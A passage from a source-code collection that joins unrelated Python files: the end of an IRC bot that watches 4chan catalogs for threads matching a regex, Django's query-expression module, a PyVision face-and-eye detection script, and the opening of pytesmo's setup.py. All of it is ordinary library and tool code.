content = json.load(urlopen("http://a.4cdn.org/%s/catalog.json" % board))
for i in range(len(content)):
for athread in content[i]["threads"]:
comment = ""
subject = ""
try:
comment = athread["com"]
except KeyError:
break
try:
subject = athread["sub"]
except KeyError:
pass
if (search('(?i)%s' % regex, comment)
or search('(?i)%s' % regex, subject)
and int(athread["no"]) > postNum):
oldPostNum = postNum
postNum = int(athread["no"])
output = ("Found new thread matching %s - http://boards.4chan.org/%s/res/%s - %s"
% (regex, board, athread["no"], athread["com"][:50]))
output = (HTMLParser.HTMLParser().unescape(output)).encode('utf-8')
if oldPostNum != 0:
connection.privmsg(channel, output)
break
if oldPostNum != postNum:
break
except:
return
sleep(updateInterval)
| gpl-2.0 |
frishberg/django | django/db/models/expressions.py | 16 | 31921 | import copy
import datetime
from django.core.exceptions import EmptyResultSet, FieldError
from django.db.backends import utils as backend_utils
from django.db.models import fields
from django.db.models.query_utils import Q
from django.utils import six
from django.utils.functional import cached_property
class Combinable(object):
"""
Provides the ability to combine one or two objects with
some connector. For example F('foo') + F('bar').
"""
# Arithmetic connectors
ADD = '+'
SUB = '-'
MUL = '*'
DIV = '/'
POW = '^'
# The following is a quoted % operator - it is quoted because it can be
# used in strings that also have parameter substitution.
MOD = '%%'
# Bitwise operators - note that these are generated by .bitand()
# and .bitor(), the '&' and '|' are reserved for boolean operator
# usage.
BITAND = '&'
BITOR = '|'
def _combine(self, other, connector, reversed, node=None):
if not hasattr(other, 'resolve_expression'):
# everything must be resolvable to an expression
if isinstance(other, datetime.timedelta):
other = DurationValue(other, output_field=fields.DurationField())
else:
other = Value(other)
if reversed:
return CombinedExpression(other, connector, self)
return CombinedExpression(self, connector, other)
#############
# OPERATORS #
#############
def __add__(self, other):
return self._combine(other, self.ADD, False)
def __sub__(self, other):
return self._combine(other, self.SUB, False)
def __mul__(self, other):
return self._combine(other, self.MUL, False)
def __truediv__(self, other):
return self._combine(other, self.DIV, False)
def __div__(self, other): # Python 2 compatibility
return type(self).__truediv__(self, other)
def __mod__(self, other):
return self._combine(other, self.MOD, False)
def __pow__(self, other):
return self._combine(other, self.POW, False)
def __and__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def bitand(self, other):
return self._combine(other, self.BITAND, False)
def __or__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def bitor(self, other):
return self._combine(other, self.BITOR, False)
def __radd__(self, other):
return self._combine(other, self.ADD, True)
def __rsub__(self, other):
return self._combine(other, self.SUB, True)
def __rmul__(self, other):
return self._combine(other, self.MUL, True)
def __rtruediv__(self, other):
return self._combine(other, self.DIV, True)
def __rdiv__(self, other): # Python 2 compatibility
return type(self).__rtruediv__(self, other)
def __rmod__(self, other):
return self._combine(other, self.MOD, True)
def __rpow__(self, other):
return self._combine(other, self.POW, True)
def __rand__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def __ror__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
class BaseExpression(object):
"""
Base class for all query expressions.
"""
# aggregate specific fields
is_summary = False
_output_field = None
def __init__(self, output_field=None):
if output_field is not None:
self._output_field = output_field
def get_db_converters(self, connection):
return [self.convert_value] + self.output_field.get_db_converters(connection)
def get_source_expressions(self):
return []
def set_source_expressions(self, exprs):
assert len(exprs) == 0
def _parse_expressions(self, *expressions):
return [
arg if hasattr(arg, 'resolve_expression') else (
F(arg) if isinstance(arg, six.string_types) else Value(arg)
) for arg in expressions
]
def as_sql(self, compiler, connection):
"""
Responsible for returning a (sql, [params]) tuple to be included
in the current query.
Different backends can provide their own implementation, by
providing an `as_{vendor}` method and patching the Expression:
```
def override_as_sql(self, compiler, connection):
# custom logic
return super(Expression, self).as_sql(compiler, connection)
setattr(Expression, 'as_' + connection.vendor, override_as_sql)
```
Arguments:
* compiler: the query compiler responsible for generating the query.
Must have a compile method, returning a (sql, [params]) tuple.
Calling compiler(value) will return a quoted `value`.
* connection: the database connection used for the current query.
Returns: (sql, params)
Where `sql` is a string containing ordered sql parameters to be
replaced with the elements of the list `params`.
"""
raise NotImplementedError("Subclasses must implement as_sql()")
@cached_property
def contains_aggregate(self):
for expr in self.get_source_expressions():
if expr and expr.contains_aggregate:
return True
return False
@cached_property
def contains_column_references(self):
for expr in self.get_source_expressions():
if expr and expr.contains_column_references:
return True
return False
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
"""
Provides the chance to do any preprocessing or validation before being
added to the query.
Arguments:
* query: the backend query implementation
* allow_joins: boolean allowing or denying use of joins
in this query
* reuse: a set of reusable joins for multijoins
* summarize: a terminal aggregate clause
* for_save: whether this expression about to be used in a save or update
Returns: an Expression to be added to the query.
"""
c = self.copy()
c.is_summary = summarize
c.set_source_expressions([
expr.resolve_expression(query, allow_joins, reuse, summarize)
for expr in c.get_source_expressions()
])
return c
def _prepare(self, field):
"""
Hook used by Lookup.get_prep_lookup() to do custom preparation.
"""
return self
@property
def field(self):
return self.output_field
@cached_property
def output_field(self):
"""
Returns the output type of this expressions.
"""
if self._output_field_or_none is None:
raise FieldError("Cannot resolve expression type, unknown output_field")
return self._output_field_or_none
@cached_property
def _output_field_or_none(self):
"""
Returns the output field of this expression, or None if no output type
can be resolved. Note that the 'output_field' property will raise
FieldError if no type can be resolved, but this attribute allows for
None values.
"""
if self._output_field is None:
self._resolve_output_field()
return self._output_field
def _resolve_output_field(self):
"""
Attempts to infer the output type of the expression. If the output
fields of all source fields match then we can simply infer the same
type here. This isn't always correct, but it makes sense most of the
time.
Consider the difference between `2 + 2` and `2 / 3`. Inferring
the type here is a convenience for the common case. The user should
supply their own output_field with more complex computations.
If a source does not have an `_output_field` then we exclude it from
this check. If all sources are `None`, then an error will be thrown
higher up the stack in the `output_field` property.
"""
if self._output_field is None:
sources = self.get_source_fields()
num_sources = len(sources)
if num_sources == 0:
self._output_field = None
else:
for source in sources:
if self._output_field is None:
self._output_field = source
if source is not None and not isinstance(self._output_field, source.__class__):
raise FieldError(
"Expression contains mixed types. You must set output_field")
def convert_value(self, value, expression, connection, context):
"""
Expressions provide their own converters because users have the option
of manually specifying the output_field which may be a different type
from the one the database returns.
"""
field = self.output_field
internal_type = field.get_internal_type()
if value is None:
return value
elif internal_type == 'FloatField':
return float(value)
elif internal_type.endswith('IntegerField'):
return int(value)
elif internal_type == 'DecimalField':
return backend_utils.typecast_decimal(value)
return value
def get_lookup(self, lookup):
return self.output_field.get_lookup(lookup)
def get_transform(self, name):
return self.output_field.get_transform(name)
def relabeled_clone(self, change_map):
clone = self.copy()
clone.set_source_expressions(
[e.relabeled_clone(change_map) for e in self.get_source_expressions()])
return clone
def copy(self):
c = copy.copy(self)
c.copied = True
return c
def get_group_by_cols(self):
if not self.contains_aggregate:
return [self]
cols = []
for source in self.get_source_expressions():
cols.extend(source.get_group_by_cols())
return cols
def get_source_fields(self):
"""
Returns the underlying field types used by this
aggregate.
"""
return [e._output_field_or_none for e in self.get_source_expressions()]
def asc(self):
return OrderBy(self)
def desc(self):
return OrderBy(self, descending=True)
def reverse_ordering(self):
return self
def flatten(self):
"""
Recursively yield this expression and all subexpressions, in
depth-first order.
"""
yield self
for expr in self.get_source_expressions():
if expr:
for inner_expr in expr.flatten():
yield inner_expr
class Expression(BaseExpression, Combinable):
"""
An expression that can be combined with other expressions.
"""
pass
class CombinedExpression(Expression):
def __init__(self, lhs, connector, rhs, output_field=None):
super(CombinedExpression, self).__init__(output_field=output_field)
self.connector = connector
self.lhs = lhs
self.rhs = rhs
def __repr__(self):
return "<{}: {}>".format(self.__class__.__name__, self)
def __str__(self):
return "{} {} {}".format(self.lhs, self.connector, self.rhs)
def get_source_expressions(self):
return [self.lhs, self.rhs]
def set_source_expressions(self, exprs):
self.lhs, self.rhs = exprs
def as_sql(self, compiler, connection):
try:
lhs_output = self.lhs.output_field
except FieldError:
lhs_output = None
try:
rhs_output = self.rhs.output_field
except FieldError:
rhs_output = None
if (not connection.features.has_native_duration_field and
((lhs_output and lhs_output.get_internal_type() == 'DurationField') or
(rhs_output and rhs_output.get_internal_type() == 'DurationField'))):
return DurationExpression(self.lhs, self.connector, self.rhs).as_sql(compiler, connection)
if (lhs_output and rhs_output and self.connector == self.SUB and
lhs_output.get_internal_type() in {'DateField', 'DateTimeField', 'TimeField'} and
lhs_output.get_internal_type() == lhs_output.get_internal_type()):
return TemporalSubtraction(self.lhs, self.rhs).as_sql(compiler, connection)
expressions = []
expression_params = []
sql, params = compiler.compile(self.lhs)
expressions.append(sql)
expression_params.extend(params)
sql, params = compiler.compile(self.rhs)
expressions.append(sql)
expression_params.extend(params)
# order of precedence
expression_wrapper = '(%s)'
sql = connection.ops.combine_expression(self.connector, expressions)
return expression_wrapper % sql, expression_params
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
c.lhs = c.lhs.resolve_expression(query, allow_joins, reuse, summarize, for_save)
c.rhs = c.rhs.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
class DurationExpression(CombinedExpression):
def compile(self, side, compiler, connection):
if not isinstance(side, DurationValue):
try:
output = side.output_field
except FieldError:
pass
else:
if output.get_internal_type() == 'DurationField':
sql, params = compiler.compile(side)
return connection.ops.format_for_duration_arithmetic(sql), params
return compiler.compile(side)
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
expressions = []
expression_params = []
sql, params = self.compile(self.lhs, compiler, connection)
expressions.append(sql)
expression_params.extend(params)
sql, params = self.compile(self.rhs, compiler, connection)
expressions.append(sql)
expression_params.extend(params)
# order of precedence
expression_wrapper = '(%s)'
sql = connection.ops.combine_duration_expression(self.connector, expressions)
return expression_wrapper % sql, expression_params
class TemporalSubtraction(CombinedExpression):
def __init__(self, lhs, rhs):
super(TemporalSubtraction, self).__init__(lhs, self.SUB, rhs, output_field=fields.DurationField())
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
lhs = compiler.compile(self.lhs, connection)
rhs = compiler.compile(self.rhs, connection)
return connection.ops.subtract_temporals(self.lhs.output_field.get_internal_type(), lhs, rhs)
class F(Combinable):
"""
An object capable of resolving references to existing query objects.
"""
def __init__(self, name):
"""
Arguments:
* name: the name of the field this expression references
"""
self.name = name
def __repr__(self):
return "{}({})".format(self.__class__.__name__, self.name)
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
return query.resolve_ref(self.name, allow_joins, reuse, summarize)
def asc(self):
return OrderBy(self)
def desc(self):
return OrderBy(self, descending=True)
class Func(Expression):
"""
An SQL function call.
"""
function = None
template = '%(function)s(%(expressions)s)'
arg_joiner = ', '
arity = None # The number of arguments the function accepts.
def __init__(self, *expressions, **extra):
if self.arity is not None and len(expressions) != self.arity:
raise TypeError(
"'%s' takes exactly %s %s (%s given)" % (
self.__class__.__name__,
self.arity,
"argument" if self.arity == 1 else "arguments",
len(expressions),
)
)
output_field = extra.pop('output_field', None)
super(Func, self).__init__(output_field=output_field)
self.source_expressions = self._parse_expressions(*expressions)
self.extra = extra
def __repr__(self):
args = self.arg_joiner.join(str(arg) for arg in self.source_expressions)
extra = ', '.join(str(key) + '=' + str(val) for key, val in self.extra.items())
if extra:
return "{}({}, {})".format(self.__class__.__name__, args, extra)
return "{}({})".format(self.__class__.__name__, args)
def get_source_expressions(self):
return self.source_expressions
def set_source_expressions(self, exprs):
self.source_expressions = exprs
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
for pos, arg in enumerate(c.source_expressions):
c.source_expressions[pos] = arg.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
def as_sql(self, compiler, connection, function=None, template=None, arg_joiner=None, **extra_context):
connection.ops.check_expression_support(self)
sql_parts = []
params = []
for arg in self.source_expressions:
arg_sql, arg_params = compiler.compile(arg)
sql_parts.append(arg_sql)
params.extend(arg_params)
data = self.extra.copy()
data.update(**extra_context)
# Use the first supplied value in this order: the parameter to this
# method, a value supplied in __init__()'s **extra (the value in
# `data`), or the value defined on the class.
if function is not None:
data['function'] = function
else:
data.setdefault('function', self.function)
template = template or data.get('template', self.template)
arg_joiner = arg_joiner or data.get('arg_joiner', self.arg_joiner)
data['expressions'] = data['field'] = arg_joiner.join(sql_parts)
return template % data, params
def as_sqlite(self, compiler, connection):
sql, params = self.as_sql(compiler, connection)
try:
if self.output_field.get_internal_type() == 'DecimalField':
sql = 'CAST(%s AS NUMERIC)' % sql
except FieldError:
pass
return sql, params
def copy(self):
copy = super(Func, self).copy()
copy.source_expressions = self.source_expressions[:]
copy.extra = self.extra.copy()
return copy
class Value(Expression):
"""
Represents a wrapped value as a node within an expression
"""
def __init__(self, value, output_field=None):
"""
Arguments:
* value: the value this expression represents. The value will be
added into the sql parameter list and properly quoted.
* output_field: an instance of the model field type that this
expression will return, such as IntegerField() or CharField().
"""
super(Value, self).__init__(output_field=output_field)
self.value = value
def __repr__(self):
return "{}({})".format(self.__class__.__name__, self.value)
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
val = self.value
# check _output_field to avoid triggering an exception
if self._output_field is not None:
if self.for_save:
val = self.output_field.get_db_prep_save(val, connection=connection)
else:
val = self.output_field.get_db_prep_value(val, connection=connection)
if val is None:
# cx_Oracle does not always convert None to the appropriate
# NULL type (like in case expressions using numbers), so we
# use a literal SQL NULL
return 'NULL', []
return '%s', [val]
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = super(Value, self).resolve_expression(query, allow_joins, reuse, summarize, for_save)
c.for_save = for_save
return c
def get_group_by_cols(self):
return []
class DurationValue(Value):
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
if (connection.features.has_native_duration_field and
connection.features.driver_supports_timedelta_args):
return super(DurationValue, self).as_sql(compiler, connection)
return connection.ops.date_interval_sql(self.value)
class RawSQL(Expression):
def __init__(self, sql, params, output_field=None):
if output_field is None:
output_field = fields.Field()
self.sql, self.params = sql, params
super(RawSQL, self).__init__(output_field=output_field)
def __repr__(self):
return "{}({}, {})".format(self.__class__.__name__, self.sql, self.params)
def as_sql(self, compiler, connection):
return '(%s)' % self.sql, self.params
def get_group_by_cols(self):
return [self]
class Star(Expression):
def __repr__(self):
return "'*'"
def as_sql(self, compiler, connection):
return '*', []
class Random(Expression):
def __init__(self):
super(Random, self).__init__(output_field=fields.FloatField())
def __repr__(self):
return "Random()"
def as_sql(self, compiler, connection):
return connection.ops.random_function_sql(), []
class Col(Expression):
contains_column_references = True
def __init__(self, alias, target, output_field=None):
if output_field is None:
output_field = target
super(Col, self).__init__(output_field=output_field)
self.alias, self.target = alias, target
def __repr__(self):
return "{}({}, {})".format(
self.__class__.__name__, self.alias, self.target)
def as_sql(self, compiler, connection):
qn = compiler.quote_name_unless_alias
return "%s.%s" % (qn(self.alias), qn(self.target.column)), []
def relabeled_clone(self, relabels):
return self.__class__(relabels.get(self.alias, self.alias), self.target, self.output_field)
def get_group_by_cols(self):
return [self]
def get_db_converters(self, connection):
if self.target == self.output_field:
return self.output_field.get_db_converters(connection)
return (self.output_field.get_db_converters(connection) +
self.target.get_db_converters(connection))
class Ref(Expression):
"""
Reference to column alias of the query. For example, Ref('sum_cost') in
qs.annotate(sum_cost=Sum('cost')) query.
"""
def __init__(self, refs, source):
super(Ref, self).__init__()
self.refs, self.source = refs, source
def __repr__(self):
return "{}({}, {})".format(self.__class__.__name__, self.refs, self.source)
def get_source_expressions(self):
return [self.source]
def set_source_expressions(self, exprs):
self.source, = exprs
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
# The sub-expression `source` has already been resolved, as this is
# just a reference to the name of `source`.
return self
def relabeled_clone(self, relabels):
return self
def as_sql(self, compiler, connection):
return "%s" % connection.ops.quote_name(self.refs), []
def get_group_by_cols(self):
return [self]
class ExpressionWrapper(Expression):
"""
An expression that can wrap another expression so that it can provide
extra context to the inner expression, such as the output_field.
"""
def __init__(self, expression, output_field):
super(ExpressionWrapper, self).__init__(output_field=output_field)
self.expression = expression
def set_source_expressions(self, exprs):
self.expression = exprs[0]
def get_source_expressions(self):
return [self.expression]
def as_sql(self, compiler, connection):
return self.expression.as_sql(compiler, connection)
def __repr__(self):
return "{}({})".format(self.__class__.__name__, self.expression)
class When(Expression):
template = 'WHEN %(condition)s THEN %(result)s'
def __init__(self, condition=None, then=None, **lookups):
if lookups and condition is None:
condition, lookups = Q(**lookups), None
if condition is None or not isinstance(condition, Q) or lookups:
raise TypeError("__init__() takes either a Q object or lookups as keyword arguments")
super(When, self).__init__(output_field=None)
self.condition = condition
self.result = self._parse_expressions(then)[0]
def __str__(self):
return "WHEN %r THEN %r" % (self.condition, self.result)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self)
def get_source_expressions(self):
return [self.condition, self.result]
def set_source_expressions(self, exprs):
self.condition, self.result = exprs
def get_source_fields(self):
# We're only interested in the fields of the result expressions.
return [self.result._output_field_or_none]
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
if hasattr(c.condition, 'resolve_expression'):
c.condition = c.condition.resolve_expression(query, allow_joins, reuse, summarize, False)
c.result = c.result.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
def as_sql(self, compiler, connection, template=None, **extra_context):
connection.ops.check_expression_support(self)
template_params = extra_context
sql_params = []
condition_sql, condition_params = compiler.compile(self.condition)
template_params['condition'] = condition_sql
sql_params.extend(condition_params)
result_sql, result_params = compiler.compile(self.result)
template_params['result'] = result_sql
sql_params.extend(result_params)
template = template or self.template
return template % template_params, sql_params
def get_group_by_cols(self):
# This is not a complete expression and cannot be used in GROUP BY.
cols = []
for source in self.get_source_expressions():
cols.extend(source.get_group_by_cols())
return cols
class Case(Expression):
"""
An SQL searched CASE expression:
CASE
WHEN n > 0
THEN 'positive'
WHEN n < 0
THEN 'negative'
ELSE 'zero'
END
"""
template = 'CASE %(cases)s ELSE %(default)s END'
case_joiner = ' '
def __init__(self, *cases, **extra):
if not all(isinstance(case, When) for case in cases):
raise TypeError("Positional arguments must all be When objects.")
default = extra.pop('default', None)
output_field = extra.pop('output_field', None)
super(Case, self).__init__(output_field)
self.cases = list(cases)
self.default = self._parse_expressions(default)[0]
self.extra = extra
def __str__(self):
return "CASE %s, ELSE %r" % (', '.join(str(c) for c in self.cases), self.default)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self)
def get_source_expressions(self):
return self.cases + [self.default]
def set_source_expressions(self, exprs):
self.cases = exprs[:-1]
self.default = exprs[-1]
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
for pos, case in enumerate(c.cases):
c.cases[pos] = case.resolve_expression(query, allow_joins, reuse, summarize, for_save)
c.default = c.default.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
def copy(self):
c = super(Case, self).copy()
c.cases = c.cases[:]
return c
def as_sql(self, compiler, connection, template=None, case_joiner=None, **extra_context):
connection.ops.check_expression_support(self)
if not self.cases:
return compiler.compile(self.default)
template_params = self.extra.copy()
template_params.update(extra_context)
case_parts = []
sql_params = []
for case in self.cases:
try:
case_sql, case_params = compiler.compile(case)
except EmptyResultSet:
continue
case_parts.append(case_sql)
sql_params.extend(case_params)
default_sql, default_params = compiler.compile(self.default)
if not case_parts:
return default_sql, default_params
case_joiner = case_joiner or self.case_joiner
template_params['cases'] = case_joiner.join(case_parts)
template_params['default'] = default_sql
sql_params.extend(default_params)
template = template or template_params.get('template', self.template)
sql = template % template_params
if self._output_field_or_none is not None:
sql = connection.ops.unification_cast_sql(self.output_field) % sql
return sql, sql_params
class OrderBy(BaseExpression):
template = '%(expression)s %(ordering)s'
def __init__(self, expression, descending=False):
self.descending = descending
if not hasattr(expression, 'resolve_expression'):
raise ValueError('expression must be an expression type')
self.expression = expression
def __repr__(self):
return "{}({}, descending={})".format(
self.__class__.__name__, self.expression, self.descending)
def set_source_expressions(self, exprs):
self.expression = exprs[0]
def get_source_expressions(self):
return [self.expression]
def as_sql(self, compiler, connection, template=None, **extra_context):
connection.ops.check_expression_support(self)
expression_sql, params = compiler.compile(self.expression)
placeholders = {
'expression': expression_sql,
'ordering': 'DESC' if self.descending else 'ASC',
}
placeholders.update(extra_context)
template = template or self.template
return (template % placeholders).rstrip(), params
def get_group_by_cols(self):
cols = []
for source in self.get_source_expressions():
cols.extend(source.get_group_by_cols())
return cols
def reverse_ordering(self):
self.descending = not self.descending
return self
def asc(self):
self.descending = False
def desc(self):
self.descending = True
| bsd-3-clause |
Dfred/concept-robot | HRI/vision/pyvision_0.9.0/src/pyvision/tools/face_scan.py | 7 | 8214 | # PyVision License
#
# Copyright (c) 2006-2008 David S. Bolme
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither name of copyright holders nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
This tool scans a directory for image files and detects faces and eyes in those
images. A CSV file is generated that has each face detection and ASEF eye
coordinates for each face detection.
'''
import optparse
import csv
import os
import pyvision as pv
from pyvision.face.CascadeDetector import CascadeDetector
from pyvision.face.FilterEyeLocator import FilterEyeLocator
import PIL
import random
EXTENSIONS = ["PGM","PPM","BMP","JPG","JPEG","GIF","PNG","TIF","TIFF"]
def parseOptions():
usage = "usage: %prog [options] <image_directory> <output.csv>"
parser = optparse.OptionParser(usage)
parser.add_option("--rotate", dest="rotate",default=False,
action="store_true",
help="Used to detection faces in images where the camera was turn while taking the photo. Tests all four rotations.")
parser.add_option("--scale", dest="scale",default=1.0,type='float',
help="Rescale the image before detection to improve performance.")
parser.add_option("--extension", dest="extension",default=None,
help="Attempt to process images with this extension.")
parser.add_option("--log", dest="log_dir",default=None,
help="Create a directory containing annotated images.")
parser.add_option("--log-scale", dest="log_scale",default=1.0,type='float',
help="Rescale images before they are logged.")
parser.add_option("--sample", dest="sample",default=None,type='int',
help="Randomly sample n images to process.")
parser.add_option("-v", "--verbose",
action="store_true", dest="verbose",
help="Turn on more verbose output.")
(options, args) = parser.parse_args()
if len(args) != 2:
parser.error("This program requires two arguments: a directory containing images and the name of a file to use for output.")
return options, args
def processFaces(im,face_detect,locate_eyes):
# Run face detection
faces = face_detect(im)
return locate_eyes(im,faces)
#results = []
#i = 0
#for face in faces:
# Run eye detection
# affine = pv.AffineFromRect(face, (128, 128))
# face_im = affine.transformImage(im)
# cv_im = face_im.asOpenCVBW()
# eye1, eye2, corr1, corr2 = locate_eyes.locateEyes(cv_im)
# eye1, eye2 = affine.invertPoints([pv.Point(eye1), pv.Point(eye2)])
# results.append([face,eye1,eye2])
# i += 1
#
#return results
if __name__ == "__main__":
# Read in program arguments and options.
options, args = parseOptions()
#locator_filename = os.path.join(csu.__path__[0],'data','EyeLocatorASEF128x128.fel')
# Scan the directory for image files.
image_names = []
for dirpath, dirnames, filenames in os.walk(args[0]):
for filename in filenames:
extension = filename.split('.')[-1]
extension = extension.upper()
if (options.extension==None and extension in EXTENSIONS) or (options.extension != None and options.extension.upper() == extension):
pathname = os.path.join(dirpath,filename)
image_names.append(pathname)
# If an integer is passed to the sample option then subselect the image names.
if options.sample != None:
image_names = random.sample(image_names,options.sample)
# Open the file to use as output.
f = open(args[1],'wb')
csv_file = csv.writer(f)
headers = ['image_name','detect_number','detect_x','detect_y','detect_width','detect_height','eye1_x','eye1_y','eye2_x','eye2_y']
csv_file.writerow(headers)
# Create an image log if this is being saved to a file.
ilog = None
if options.log_dir != None:
print "Creating Image Log..."
ilog = pv.ImageLog(options.log_dir)
# For each image run face and eye detection
face_detect = CascadeDetector(image_scale=1.3*options.scale)
locate_eyes = FilterEyeLocator()#locator_filename)
c = 0
for pathname in image_names:
c += 1
im = pv.Image(pathname)
scale = options.log_scale
log_im = pv.AffineScale(scale,(int(scale*im.width),int(scale*im.height))).transformImage(im)
results = processFaces(im,face_detect,locate_eyes)
if options.rotate:
rot_image = pv.Image(im.asPIL().transpose(PIL.Image.ROTATE_90))
more_results = processFaces(rot_image,face_detect,locate_eyes)
for face,eye1,eye2 in more_results:
results.append([pv.Rect(im.width-face.y-face.h, face.x, face.h, face.w),
pv.Point(im.width-eye1.Y(),eye1.X()),
pv.Point(im.width-eye2.Y(),eye2.X())])
rot_image = pv.Image(im.asPIL().transpose(PIL.Image.ROTATE_180))
more_results = processFaces(rot_image,face_detect,locate_eyes)
for face,eye1,eye2 in more_results:
results.append([pv.Rect(im.width - face.x - face.w, im.height-face.y-face.h, face.w, face.h),
pv.Point(im.width-eye1.X(),im.height-eye1.Y()),
pv.Point(im.width-eye2.X(),im.height-eye2.Y())])
rot_image = pv.Image(im.asPIL().transpose(PIL.Image.ROTATE_270))
more_results = processFaces(rot_image,face_detect,locate_eyes)
for face,eye1,eye2 in more_results:
results.append([pv.Rect(face.y, im.height-face.x-face.w, face.h, face.w),
pv.Point(eye1.Y(),im.height-eye1.X()),
pv.Point(eye2.Y(),im.height-eye2.X())])
n_faces = 0
for face,eye1,eye2 in results:
csv_file.writerow([pathname,n_faces,face.x,face.y,face.w,face.h,eye1.X(),eye1.Y(),eye2.X(),eye2.Y()])
if ilog != None:
log_im.annotateRect(scale*face)
log_im.annotatePoint(scale*eye1)
log_im.annotatePoint(scale*eye2)
n_faces += 1
#else:
# csv_file.writerow([pathname,"NA","NA","NA","NA","NA","NA","NA","NA","NA"])
print "Processed %5d of %d: [%2d faces] %s "%(c,len(image_names),n_faces,pathname)
if ilog != None:
basename = os.path.basename(pathname)
basename = basename.split('.')[0]
ilog.log(log_im,label=basename)
if ilog != None:
ilog.show()
| gpl-3.0 |
christophreimer/pytesmo | setup.py | 1 | 8410 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Setup file for pytesmo.
This file was generated with PyScaffold 1.3, a tool that easily
puts up a scaffold for your new Python project. Learn more under:
http://pyscaffold.readthedocs.org/
"""
import os
import sys
import inspect
from distutils.cmd import Command
import versioneer
import setuptools
from setuptools.command.test import test as TestCommand
from setuptools import setup
from distutils.extension import Extension
from distutils.command.build_ext import build_ext as _build_ext
import pkg_resources
class Cythonize(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
# Make sure the compiled Cython files in the distribution are
# up-to-date
from Cython.Build import cythonize
cythonize(['pytesmo/time_series/filters.pyx'])
class NumpyBuildExt(_build_ext):
def build_extensions(self):
numpy_incl = pkg_resources.resource_filename('numpy', 'core/include')
for ext in self.extensions:
if hasattr(ext, 'include_dirs') and not numpy_incl in ext.include_dirs:
ext.include_dirs.append(numpy_incl)
_build_ext.build_extensions(self)
ext_modules = [Extension("pytesmo.time_series.filters",
["pytesmo/time_series/filters.c"], include_dirs=[]), ]
__location__ = os.path.join(os.getcwd(), os.path.dirname(
inspect.getfile(inspect.currentframe())))
# Change these settings according to your needs
MAIN_PACKAGE = "pytesmo"
DESCRIPTION = "python Toolbox for the evaluation of soil moisture observations"
LICENSE = "BSD 3 Clause"
URL = "http://rs.geo.tuwien.ac.at/validation_tool/pytesmo/"
AUTHOR = "pytesmo Developers"
EMAIL = "[email protected]"
COVERAGE_XML = False
COVERAGE_HTML = False
JUNIT_XML = False
# Add here all kinds of additional classifiers as defined under
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
CLASSIFIERS = ['Development Status :: 4 - Beta',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4']
# Add here console scripts like ['hello_world = pytesmo.module:function']
CONSOLE_SCRIPTS = []
# Versioneer configuration
versioneer.VCS = 'git'
versioneer.versionfile_source = os.path.join(MAIN_PACKAGE, '_version.py')
versioneer.versionfile_build = os.path.join(MAIN_PACKAGE, '_version.py')
versioneer.tag_prefix = 'v' # tags are like v1.2.0
versioneer.parentdir_prefix = MAIN_PACKAGE + '-'
class PyTest(TestCommand):
user_options = [("cov=", None, "Run coverage"),
("cov-xml=", None, "Generate junit xml report"),
("cov-html=", None, "Generate junit html report"),
("junitxml=", None, "Generate xml of test results")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.cov = None
self.cov_xml = False
self.cov_html = False
self.junitxml = None
def finalize_options(self):
TestCommand.finalize_options(self)
if self.cov is not None:
self.cov = ["--cov", self.cov, "--cov-report", "term-missing"]
